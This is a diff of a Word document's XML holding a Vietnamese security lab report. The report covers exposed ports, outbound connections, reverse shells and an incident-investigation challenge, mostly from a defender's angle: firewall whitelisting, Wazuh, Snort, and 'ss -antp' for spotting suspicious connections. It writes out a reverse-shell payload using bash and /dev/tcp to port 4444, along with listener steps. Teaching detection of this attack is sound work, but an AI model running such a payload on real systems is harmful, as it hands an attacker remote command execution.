+        <w:t>Rủi ro lớn nhất nằm ở các port đang mở ra môi trường public, đặc biệt là port 22 (SSH)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. V</w:t>
+      </w:r>
+      <w:r>
+        <w:t>iệc để mở bất kỳ port nào của các dịch vụ không thực sự cần thiết, hoặc các dịch vụ dùng giao thức không mã hóa, đều tạo cơ hội cho kẻ tấn công khai thác lỗ hổng hoặc nghe lén dữ liệu</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>- Output nào c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n chú ý?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>- Có r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ủ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i ro b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t nào?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>- N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u là h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t thì c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> x</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> lý gì thêm?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nh ch</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>p th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hành:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br/>
-        <w:t>------------------------------------------------------------</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>------------------------------------------------------------</w:t>
+        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Thu hẹp bề mặt tấn công: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Tắt triệt để các dịch vụ không cần thiết</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Kiểm soát truy cập bằng Firewall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Sử dụng iptables, ufw hoặc firewall cứng để thiết lập whitelist.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Giám sát và Phản hồi chủ động</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6646,46 +1674,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu:</w:t>
+        <w:t>Mục tiêu:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u outbound connection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Các bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n:</w:t>
+        <w:t>Hiểu outbound connection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6693,19 +1691,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 1: M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ở</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> listener</w:t>
+        <w:t>Bước 1: Mở listener</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6718,25 +1704,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 2: M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ở</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> terminal m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Bước 2: Mở terminal mới</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6749,19 +1717,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 3: T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o reverse shell</w:t>
+        <w:t>Bước 3: Tạo reverse shell</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6774,24 +1730,62 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 4: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra connection</w:t>
+        <w:t>Bước 4: Kiểm tra connection</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t>ss -antp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24000284" wp14:editId="02979C62">
+            <wp:extent cx="5486400" cy="4627245"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="1001207438" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1001207438" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="4627245"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -6799,13 +1793,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 5: Kill process</w:t>
+        <w:t>Bước 5: Kill process</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6815,25 +1803,46 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i:</w:t>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680AECFA" wp14:editId="063231D4">
+            <wp:extent cx="4858428" cy="1467055"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1471874209" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1471874209" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4858428" cy="1467055"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6841,13 +1850,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y outbound connection</w:t>
+        <w:t>Thấy outbound connection</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6855,13 +1858,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u reverse shell</w:t>
+        <w:t>Hiểu reverse shell</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6869,13 +1866,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u suspicious connection</w:t>
+        <w:t>Hiểu suspicious connection</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6886,127 +1877,144 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>- Command nào quan tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t?</w:t>
+        <w:t>- Command nào quan trọng nhất?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Ở góc độ tấn công: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Lệnh bash -i &gt;&amp; /dev/tcp/127.0.0.1/4444 0&gt;&amp;1 là quan trọng nhất. Đây chính là payload để tạo ra một Reverse Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Ở góc độ phòng thủ: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Lệnh ss -antp là quan trọng nhất. Nó liệt kê chi tiết các kết nối mạng đang hoạt động, từ đó rà soát và phát hiện những kết nối bất thường đang "tuồn" dữ liệu ra ngoài</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>- Output nào c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n chú ý?</w:t>
+        <w:t>- Output nào cần chú ý?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Khi chạy lệnh ss -antp, cần chú ý:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Trạng thái</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: các kết nối có trạng thái ESTAB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Chiều kết nối: Outbound connection sẽ có Local Address là một port ngẫu nhiên mức cao, kết nối đến Peer Address là một IP và Port lạ</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Tiến trình: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Nếu thấy cột process hiển thị các shell (như bash</w:t>
+      </w:r>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+      <w:r>
+        <w:t>) hoặc các công cụ không được thiết kế cho mạng đang duy trì một kết nối ra bên ngoài, thì hệ thống gần như chắc chắn đã bị xâm nhập bằng Reverse Shell.</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>- Có r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ủ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i ro b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t nào?</w:t>
+        <w:t>- Có rủi ro bảo mật nào?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Reverse Shell là kỹ thuật sinh ra để vượt qua Firewall. Thông thường, Firewall được cấu hình rất chặt chẽ ở chiều Inbound (chặn người ngoài kết nối vào server), nhưng lại thường thả lỏng ở chiều Outbound (cho phép server thoải mái kết nối ra internet để tải bản cập nhật, gọi API,...). Kẻ tấn công lợi dụng lỗ hổng của một ứng dụng web (ví dụ: lỗi upload file, SQL Injection) để ép máy chủ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>chủ động</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tạo kết nối (outbound) ngược về máy của chúng. Một khi kết nối thành công, kẻ tấn công có toàn quyền thực thi lệnh trên máy chủ với quyền của user đang chạy ứng dụng (ở đây là user chạy tiến trình bash)</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>- N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u là h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t thì c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n x</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> lý gì thêm?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nh ch</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>p th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hành:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br/>
-        <w:t>------------------------------------------------------------</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>---</w:t>
-      </w:r>
-      <w:r>
-        <w:t>---------------------------------------------------------</w:t>
+        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Kiểm soát Outbound Firewall</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Không bao giờ cấu hình Firewall cho phép server mở mọi kết nối ra internet</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>chỉ được phép gọi ra ngoài đến các IP/Domain và Port cụ thể đã được phê duyệt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Giám sát tại Endpoint</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (Wazuh)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Triển khai NIDS/NIPS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Sử dụng các hệ thống như Snort để phân tích gói tin mạng. Vì các Reverse Shell cơ bản</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>thường truyền dữ liệu dưới dạng plain-text không mã hóa, Snort có thể dễ dàng bắt được các signature của dòng lệnh Linux chạy qua đường mạng để cảnh báo hoặc drop ngay gói tin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Nguyên tắc đặc quyền tối thiểu: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7014,42 +2022,13 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Challenge T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ổ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng H</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>p</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>D</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ộ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t incident g</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ồ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m:</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Challenge Tổng Hợp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dựng một incident gồm:</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -7072,27 +2051,506 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Sau đó t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> đi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ề</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u tra toàn b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ộ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> như SOC Analyst.</w:t>
-      </w:r>
-    </w:p>
+        <w:t>Sau đó tự điều tra toàn bộ như SOC Analyst.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8574DD" wp14:editId="059A0D5F">
+            <wp:extent cx="5486400" cy="2700655"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="379578314" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="379578314" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="2700655"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Trên Victim:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E3E3163" wp14:editId="0A142E18">
+            <wp:extent cx="4534533" cy="638264"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1747585608" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1747585608" name="Picture 1747585608"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4534533" cy="638264"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Trên Attacker:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E947A11" wp14:editId="5A2D7AD7">
+            <wp:extent cx="5486400" cy="1687195"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="991095075" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="991095075" name="Picture 991095075"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="1687195"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Trên Victim: Kiểm tra log:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DA450FC" wp14:editId="7EDD4ACF">
+            <wp:extent cx="5486400" cy="1825625"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="1946700150" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1946700150" name="Picture 1946700150"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="1825625"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Trên Attacker, mở cổng 4444 để nhận shell:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75818776" wp14:editId="0536BC3F">
+            <wp:extent cx="3715268" cy="724001"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="728522502" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="728522502" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3715268" cy="724001"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
